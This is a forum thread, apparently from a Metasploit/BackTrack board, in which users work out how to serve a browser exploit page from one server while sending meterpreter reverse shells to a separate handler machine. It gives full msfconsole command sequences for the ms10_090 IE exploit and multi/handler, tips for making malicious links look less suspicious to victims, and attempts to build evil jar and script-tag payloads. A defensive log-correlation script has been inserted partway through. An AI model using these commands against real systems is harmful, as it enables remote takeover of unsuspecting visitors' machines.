Hi everyone!
In browser attacks, a server is launched on BT but I would like to "move the server"; let me explain: instead of going to http://192.168.1.2:8080/test for example (which is my BT machine address with the malicious webpage), I would like to export the malicious webpage to another server. Then I would just have to launch the handler on the BT machine.
Is that possible, and if yes, how?
Ps: for those wondering what's the use, well not so much... I would just like to know, the same way I wanted to know metasploit, with no goal.
Ps2: Sorry for grammar errors and co, English is not my native language.
Well there are two different variables to set. Lhost is the attacking box and srvhost is the server host. Explore changing the server host.
Thanks for the fast answer. I tried modifying SRVHOST, the server was not started (as expected). But I couldn't get it to do what I wanted...
The parameters are:
SRVHOST = Com.org - Only the best links ... (the server I would like the webpage to be to... Of course i didn't expect a page to show up on the server out of nowhere)
SRVHOST = 80
URIPATH = test
The handler caught a signal when I entered http://LHOST:SRVPORT/test but I don't comprehend what SRVHOST has to do with anything...
I'll dig some more but I really have no idea how to move the webpage... Isn't there a way to "export" the malicious webpage as *.html and then host it elsewhere?
What is this second machine you are wanting to run the server on, Windows or Linux? I would run the metasploit framework (exploit) on your 'webserver' machine, point the reverse payload to your 'handler' machine IP, and set the option
Code:
    msf exploit(ms10_090_ie_css_clip) > set DisablePayloadHandler true
Then start the metasploit framework (handler) on your 'handler' machine.
With my exploit example, I usually set
srvhost=0.0.0.0 <--- tells the framework what IP address for the http server to listen on
srvport=80 <--- what port the http server will listen on.
uripath=/ <--- the webserver directory structure. Keeping it at / helps things stay simple.
So in other words, on your webserver machine you might start the framework and do this
Code:
    use windows/browser/ms10_090_ie_css_clip
    set srvhost 192.168.0.50 (this is your webserver machine IP)
    set srvport 80
    set uripath /
    set payload windows/meterpreter/reverse_tcp
    set lhost 192.168.0.75 (this is your handler machine IP)
    set lport 9999
    set DisablePayloadHandler true
    exploit
and on your handler machine you would start the framework and do this
Code:
    use exploit/multi/handler
    set payload windows/meterpreter/reverse_tcp
    set lhost 0.0.0.0
    set lport 9999
    exploit
First of all, thank you!
I think that would be a good way to do it, but it requires two machines equipped with msf. What I had in mind was creating the webpage on BT along with the payload, then hosting the webpage on a server, so that when the page is visited, it connects back to the handler on the BT machine.
The server I use is wampserver on Windows. I started the server to discover html, php and mysql a few days ago, and as I used an exploit that required a webpage, I thought of hosting the page on the wampserver, so that the page looks "normal", and not http://adress:port/ which is suspicious. But for stealth purposes, I guess linking from a website to the malicious webpage would do the trick as people tend not to verify the URLs.
Can you think of any way to do that?
From what you said and the research I've done I'd say it can't be done, but it would be interesting to do.
About srvhost: if I understand correctly, it is used to define the interface to listen on? So it generally is the local host IP address, or 0.0.0.0 for all interfaces. Are there other ways to use this?
Last edited by comaX; 12-22-2010 at 12:13 PM.
If you set srvport to 80 then the URL you 'give' to victims is just http://malicious.webserver.com/
and no port like :8080 needs to be at the end of the URL.
Again uripath is also useful, as sometimes if you don't specify / as the path then the link ends up looking like
http://malicious.webserver.com/ad45trfHY3
which is also somewhat suspicious.
And yes you are correct, setting 0.0.0.0 for srvhost listens on all IP interfaces, and is generally easiest.
Also, metasploit is available on windows as well, so maybe just install MSF using the windows installer. Equipping two machines with MSF should be no problem, even if one is a windows host.
MSF for windows
Regarding creating the webpage on BT msf and exporting to windows webserver, maybe try viewing the source of the page created on the BT machine perhaps. You may actually need to dig into some of the framework's ruby to see how exactly it is configuring the webserver/exploit combo. When it comes to digging into the code, you may want to consider visiting the #metasploit channel on freenode's IRC and asking the developers some questions. They can often point you in the right direction.
EDIT: It sort of sounds like you're just having difficulty with how the link ends up looking? The default settings for the exploit I mentioned above, for instance, might look like http://malicious.webserver.com:8080/df45DfrT67Yt
Just try the settings I suggested of
Code:
    set srvport 80
    set uripath /
which should clean up the link as I mentioned above, and let us know if that is what you were really looking for. The second server should not be needed with these settings.
Last edited by iproute; 12-22-2010 at 07:30 PM.
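Looking at iproute's two-machine layout from the defender's side, here is an added example (not from the thread or from Metasploit): it joins a proxy log with an egress firewall log to flag a page hit that is followed by a connection from the same client to a different host on an uncommon port, which is exactly the srvhost/lhost split described above. The log lines, client addresses, the 60-second window and the random-path regex are constructed assumptions for illustration.

```python
import re
from datetime import datetime, timedelta

# Constructed sample proxy log: timestamp client method url
PROXY_LOG = """\
2010-12-22T12:00:01 10.0.0.5 GET http://192.168.0.50:8080/df45DfrT67Yt
2010-12-22T12:00:02 10.0.0.6 GET http://intranet.example/index.html
2010-12-22T12:05:10 10.0.0.7 GET http://192.168.0.50/
"""
# Constructed sample egress firewall log: timestamp client dst_ip dst_port action
FW_LOG = """\
2010-12-22T12:00:04 10.0.0.5 192.168.0.75 9999 ALLOW
2010-12-22T12:03:00 10.0.0.6 93.184.216.34 443 ALLOW
2010-12-22T12:05:12 10.0.0.7 192.168.0.75 9999 ALLOW
"""
URL_RE = re.compile(r"^https?://([^/:]+)(?::(\d+))?(/.*)?$")
# Heuristic (assumption) for the default-looking uripath in the thread, e.g. /df45DfrT67Yt
RANDOM_PATH_RE = re.compile(r"^/[A-Za-z0-9]{8,16}$")
COMMON_PORTS = {80, 443}

def parse_proxy(text):
    """One dict per proxy line with the URL split into host, port and path."""
    hits = []
    for line in text.splitlines():
        ts, client, _method, url = line.split()
        host, port, path = URL_RE.match(url).groups()
        hits.append({"ts": datetime.fromisoformat(ts), "client": client, "host": host,
                     "port": int(port or 80), "path": path or "/"})
    return hits

def parse_fw(text):
    """One dict per firewall line: client, destination ip, destination port."""
    return [{"ts": datetime.fromisoformat(ts), "client": client, "dst": dst, "port": int(port)}
            for ts, client, dst, port, _action in (l.split() for l in text.splitlines())]

def url_looks_like_msf_default(hit):
    """True for the unclean link shape iproute describes: odd port plus random path."""
    return hit["port"] not in COMMON_PORTS and bool(RANDOM_PATH_RE.match(hit["path"]))

def correlate(hits, conns, window=timedelta(seconds=60)):
    """Flag a page hit followed within `window` by an egress connection from the same
    client to a *different* host on an uncommon port. A cleaned-up link (port 80,
    uripath /) is still caught, because the callback to lhost:lport gives it away."""
    alerts = []
    for h in hits:
        for c in conns:
            if (c["client"] != h["client"] or c["dst"] == h["host"]
                    or c["port"] in COMMON_PORTS or not h["ts"] <= c["ts"] <= h["ts"] + window):
                continue
            alerts.append({"client": h["client"], "page": f'{h["host"]}:{h["port"]}{h["path"]}',
                           "callback": f'{c["dst"]}:{c["port"]}',
                           "suspicious_url": url_looks_like_msf_default(h)})
    return alerts
```

Run against the sample logs it raises two alerts: 10.0.0.5 (the default-looking :8080/random link) and 10.0.0.7, whose link was the clean http://192.168.0.50/ but whose callback to port 9999 on a second host still stands out.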
I think this answers part of the question : I read quickly through it because I don't really have the time right now, but it seems that if you create a malicious java applet and host it on your server, this will do just as designed.
I'll dig some more when I have time and keep you posted in case of success.
I stumbled upon this while trying to generate a .jar payload, which was an epic failure. So, if you know how to do that, please tell!
(I used /java/meterpreter/reverse_tcp and tried generating with the following commands:
Code:
    generate -f java_evil.jar -t java
    generate -f java_evil.jar -t java -x workingjar.jar -k
and both produced malfunctioning jars...)
What I basically want to do is done by SET, but then again, it will be hosted on the BT machine. Maybe there is a way to output the java applet so that it can be hosted elsewhere? Or if there is no proper output, maybe it could be harvested in some way? Then again, if you have any idea... Please tell! I'll of course keep searching.
As for :80 and URIPATH /, I didn't think of it, and it sure works. But I can't use port 80 for it is already in use by the server I intend to host a malicious page on... I also tried msf on Windows but even with exceptions set, my AV was going all crazy, and still is, long after (not so proper) uninstallation, so I decided just not to use msf on Windows.
Also, maybe I should post in other threads, but since it may be relevant to this topic: I generated .js and .vbs payloads, thinking I could use them in
Code:
    <script language="blabla" src="blabla.extension"> </script>
but it didn't work, at all.
Since the .js didn't work in Windows, it's not so surprising, but the .vbs did launch a meterpreter session when executed in explorer, but failed from the browser. Maybe my tags are wrong... I also tried with
Code:
    <script language="blabla" > actual_vbs_or_js_script </script>
but it didn't work either.
Any idea about how to do that?
Last edited by comaX; 01-06-2011 at 10:52 PM.